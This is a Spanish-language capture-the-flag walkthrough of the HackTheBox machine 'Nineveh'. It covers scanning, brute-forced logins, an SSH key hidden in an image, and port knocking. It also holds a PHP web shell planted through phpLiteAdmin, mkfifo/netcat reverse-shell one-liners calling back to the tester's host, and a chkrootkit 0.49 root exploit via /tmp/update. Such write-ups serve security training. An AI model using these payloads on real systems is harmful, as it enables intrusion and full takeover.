Como siempre empezamos con un nmap. Esta maquina fue muy interesante porque se juntaron demasiadas vulnerabilidades y configuraciones extrañas como port knocking.

root@Kali2:~/Desktop# nmap -sC -sV -O -T5 10.10.10.43
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-29 11:00 CET
Nmap scan report for 10.10.10.43
Host is up (0.018s latency).
Not shown: 998 filtered ports
PORT    STATE SERVICE  VERSION
80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after:  2018-07-01T15:03:30
|_ssl-date: TLS randomness does not represent time
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.2 (92%), Linux 4.4 (92%)
No exact OS matches for host (test conditions non-ideal).

Con dirb e hydra descubrimos:

http://10.10.10.43/department/login.php
admin:1q2w3e4r5t
https://10.10.10.43/db/
password123
https://10.10.10.43/secure_notes/

Secure notes tiene una image con stenography.

root@Kali2:~/Desktop# binwalk -h

Binwalk v2.1.2
Craig Heffner, ReFirmLabs
Usage: binwalk [OPTIONS] [FILE1] [FILE2] [FILE3] ... Extraction Options: -e, --extract Automatically extract known file types -D, --dd=<type:ext:cmd> Extract <type> signatures, give the files an extension of <ext>, and execute <cmd> -M, --matryoshka Recursively scan extracted files -d, --depth=<int> Limit matryoshka recursion depth (default: 8 levels deep) -C, --directory=<str> Extract files/folders to a custom directory (default: root@Kali2:~/Desktop# binwalk -Me nineveh.png Scan Time: 2019-10-29 11:17:44 Target File: /root/Desktop/nineveh.png MD5 Checksum: 353b8f5a4578e4472c686b6e1f15c808 Signatures: 386 DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 0 0x0 PNG image, 1497 x 746, 8-bit/color RGB, non-interlaced 84 0x54 Zlib compressed data, best compression 2881744 0x2BF8D0 POSIX tar archive (GNU) Scan Time: 2019-10-29 11:17:45 Target File: /root/Desktop/_nineveh.png.extracted/54 MD5 Checksum: d41d8cd98f00b204e9800998ecf8427e Signatures: 386 DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- Scan Time: 2019-10-29 11:17:45 Target File: /root/Desktop/_nineveh.png.extracted/secret/nineveh.pub MD5 Checksum: 6b60618d207ad97e76664174e805cfda Signatures: 386 DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 0 0x0 OpenSSH RSA public key Scan Time: 2019-10-29 11:17:45 Target File: /root/Desktop/_nineveh.png.extracted/secret/nineveh.priv MD5 Checksum: f426d661f94b16292efc810ebb7ea305 Signatures: 386 DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 0 0x0 PEM RSA private key

Adentro tiene un priv and pub key pero por el momento no sabemos donde usarla.

https://10.10.10.43/db/ esta corriendo phplite con una vulnerabilidad en la base de datos. Esta vulnerabilidad permite ejecutar php.

<?php echo system($_REQUEST["cmd"]); ?>

Y luego accediendo a

http://10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes.php&cmd=ls

SQLite format 3@  -�
��S�tableaaCREATE TABLE 'a' ('css
files
footer.php
header.php
index.php
login.php
logout.php
manage.php
underconstruction.jpg
underconstruction.jpg' INTEGER)

Para una reverse shell

http://10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes.php&cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.4+1234+>/tmp/f

Ya en la machine ponemos nuestro croncheker

2019-10-29 07:38:08--  http://10.10.14.4:8000/cronchecker.sh
Connecting to 10.10.14.4:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 338 [text/x-sh]
Saving to: 'cronchecker.sh'

cronchecker.sh      100%[===================>]     338  --.-KB/s    in 0s      

2019-10-29 07:38:08 (69.9 MB/s) - 'cronchecker.sh' saved [338/338]

www-data@nineveh:/dev/shm$ chmod +x cronchecker.sh
www-data@nineveh:/dev/shm$ bash cronchecker.sh
< root      1307  1.0  0.2   8756  2228 ?        Ss   07:18   0:12 /usr/sbin/knockd -d -i ens33
> root      1307  1.0  0.2   8756  2228 ?        Ss   07:18   0:13 /usr/sbin/knockd -d -i ens33
< root       598  0.0  0.0      0     0 ?        S    07:18   0:00  \_ [kworker/0:6]
< www-data 13017  0.0  0.9 270468  9748 ?        S    07:30   0:00  \_ /usr/sbin/apache2 -k start
> www-data 13017  0.0  1.5 270920 15324 ?        S    07:30   0:00  \_ /usr/sbin/apache2 -k start
> root     21131  0.0  0.2  50224  2932 ?        S    07:39   0:00  \_ /usr/sbin/CRON -f
> root     21132  0.0  0.0   4512   804 ?        Ss   07:39   0:00      \_ /bin/sh -c /root/vulnScan.sh
> root     21134  0.0  0.2  12516  3016 ?        S    07:39   0:00          \_ /bin/bash /root/vulnScan.sh
> root     21136  1.0  0.2   4796  2072 ?        S    07:39   0:00              \_ /bin/sh /usr/bin/chkrootkit
> root     21610  0.0  0.0   4796   432 ?        S    07:39   0:00                  \_ /bin/sh /usr/bin/chkrootkit
> root     21611  0.0  0.1  28920  1556 ?        R    07:39   0:00                      \_ /bin/ps ax
> root     21612  0.0  0.0  14228  1016 ?        S    07:39   0:00                      \_ grep -E (^|[^A-Za-z0-9_])sshd([^A-Za-z0-9_]|$)
> root     21613  0.0  0.1  14228  1020 ?        S    07:39   0:00                      \_ grep -E -v grep
> root     21614  0.0  0.0  14228   936 ?        S    07:39   0:00                      \_ grep -E -v chkrootkit
> root     21615  0.0  0.0   4796   436 ?        S    07:39   0:00                      \_ /bin/sh /usr/bin/chkrootkit
> root     21616  0.0  0.1  24760  1420 ?        S    07:39   0:00                      \_ /usr/bin/awk { print $5 }

Descubrimos dos cosas interesantes.

  1. chkrootkit (vulnerable)
  2. knockd (port knocking)

LinEnum nos muestra que estamos escuchando en SSH en localhost wtf y knockd otra vez:

[-] Process binaries and associated permissions (from above list):
-rwxr-xr-x 1 root root  1037528 Jun 24  2016 /bin/bash
lrwxrwxrwx 1 root root        4 Jul  2  2017 /bin/sh -> dash
...
-rwxr-xr-x 1 root root    48080 Mar 25  2009 /usr/sbin/knockd
…
[-] Listening TCP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN      -               
tcp6       0      0 :::22                   :::*                    LISTEN

Para checkar knockd podemor ir al config file

www-data@nineveh:/dev/shm$ cat /etc/knockd.conf
[options]
 logfile = /var/log/knockd.log
 interface = ens33

[openSSH]
 sequence = 571, 290, 911
 seq_timeout = 5
 start_command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
 tcpflags = syn

[closeSSH]
 sequence = 911,290,571
 seq_timeout = 5
 start_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
 tcpflags = syn

Para abrir un puerto necesitamos “tocar” el 571, 290 y 911

root@Kali2:~/Desktop# for x in 571 290 911; do nmap -Pn --host-timeout 201 --max-retries 0 -p $x 10.10.10.43; done
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-29 13:54 CET
Warning: 10.10.10.43 giving up on port because retransmission cap hit (0).
Nmap scan report for 10.10.10.43
Host is up.

PORT    STATE    SERVICE
571/tcp filtered umeter

Nmap done: 1 IP address (1 host up) scanned in 1.12 seconds
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-29 13:54 CET
Warning: 10.10.10.43 giving up on port because retransmission cap hit (0).
Nmap scan report for 10.10.10.43
Host is up.

PORT    STATE    SERVICE
290/tcp filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 1.14 seconds
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-29 13:54 CET
Warning: 10.10.10.43 giving up on port because retransmission cap hit (0).
Nmap scan report for 10.10.10.43
Host is up.

PORT    STATE    SERVICE
911/tcp filtered xact-backup

Nmap done: 1 IP address (1 host up) scanned in 1.15 seconds
root@Kali2:~/Desktop# nmap -p 22 10.10.10.43
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-29 13:54 CET
Nmap scan report for 10.10.10.43
Host is up (0.020s latency).

PORT   STATE SERVICE
22/tcp open  ssh

Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds

Una vez abierto podemos usar entrar via SSH con la información extraida de la imagen.

Ahora vimos chrookit.

root@Kali2:~/Desktop# searchsploit chkrootkit
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                            |  Path
                                                                                                                                                                          | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Chkrootkit - Local Privilege Escalation (Metasploit)                                                                                                                      | exploits/linux/local/38775.rb
Chkrootkit 0.49 - Local Privilege Escalation                                                                                                                              | exploits/linux/local/33899.txt
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
root@Kali2:~/Desktop# searchsploit -x 33899

- Put an executable file named 'update' with non-root owner in /tmp (not
mounted noexec, obviously)
- Run chkrootkit (as uid 0)

Result: The file /tmp/update will be executed as root, thus effectively
rooting your box, if malicious content is placed inside the file.

En searchsploit nos dice que poniendo un archivo en /tmp/update se ejecutara como root. Asi que creamos un archivo “update”

#!/bin/sh

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.4 1234 >/tmp/f

Y llama a casa 🙂

root@Kali2:~/Desktop# nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.43] 39640
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# python3 -c 'import pty;pty.spawn("/bin/bash");'
root@nineveh:~# ^Z
[1]+  Stopped                 nc -nlvp 1234
root@Kali2:~/Desktop# stty raw -echo
root@Kali2:~/Desktop# nc -nlvp 1234

root@nineveh:~# cd /
root@nineveh:/# cd root/
root@nineveh:~# cat root.txt
8a2b49...